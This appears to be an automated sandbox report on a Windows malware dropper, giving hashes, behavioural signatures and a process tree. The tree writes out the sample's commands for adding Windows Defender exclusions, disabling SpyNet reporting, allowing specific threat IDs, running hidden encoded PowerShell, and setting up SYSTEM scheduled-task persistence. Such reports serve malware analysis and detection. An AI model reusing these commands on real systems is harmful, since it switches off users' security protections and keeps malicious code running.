Analysis
-
max time kernel
92s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
26-09-2022 10:03
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
b80b22d11193ab71cb8cdbfeb37da16f
-
SHA1
b3335d1375a575e09a12dd8fdcd6d82595b021fe
-
SHA256
3413d80c4cfdf5760bbacf307959ef194e4b9596a66d4078fb57d5a12ab10b7e
-
SHA512
c64ed279aa67f0851d768081f0cb2e52a09a82742f5c6932dd3762fd504afa0e82f63f0690d80ac8064009536da093e28d48ca7a04315a16db2e4dd82c799b37
-
SSDEEP
196608:91O6FYGFwHcq9FgHUkGW3+J0Wh9sNm7aIKw25S3YN/CPfxcN:3O6OlcqwjN3g0WheNKhKxc3e/Ww
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 31 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS698C.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6C7A.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsSfDYQtI" /SC once /ST 08:21:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsSfDYQtI"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsSfDYQtI"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "byLWBUphYKVPGqoaZN" /SC once /ST 12:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\wBNJbuc.exe\" rw /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\wBNJbuc.exeC:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\bWhXUEvIQwsbyrm\wBNJbuc.exe rw /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BrFEHzbpwZEBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BrFEHzbpwZEBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZFNizbZnU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZFNizbZnU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIaOnhtotwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aIaOnhtotwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gCafjQbERGAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gCafjQbERGAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\euGiausHkJdtKpVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\euGiausHkJdtKpVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\oCRUNVefZTIhACRx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\oCRUNVefZTIhACRx\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BrFEHzbpwZEBC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZFNizbZnU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aIaOnhtotwUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gCafjQbERGAU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogOKxwoIKtPajjLdTvR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\euGiausHkJdtKpVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\euGiausHkJdtKpVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKTFfLRluxQTmPRqk /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\oCRUNVefZTIhACRx /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\oCRUNVefZTIhACRx /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXZbcUFWE" /SC once /ST 09:11:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXZbcUFWE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXZbcUFWE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iczjDJyUUtiHxBiey" /SC once /ST 01:37:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\XANxVaV.exe\" pp /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "iczjDJyUUtiHxBiey"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\XANxVaV.exeC:\Windows\Temp\oCRUNVefZTIhACRx\cBNzkoAEmSRwZre\XANxVaV.exe pp /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "byLWBUphYKVPGqoaZN"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZFNizbZnU\WtSElj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "BQFrhQQBtTmYywN" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
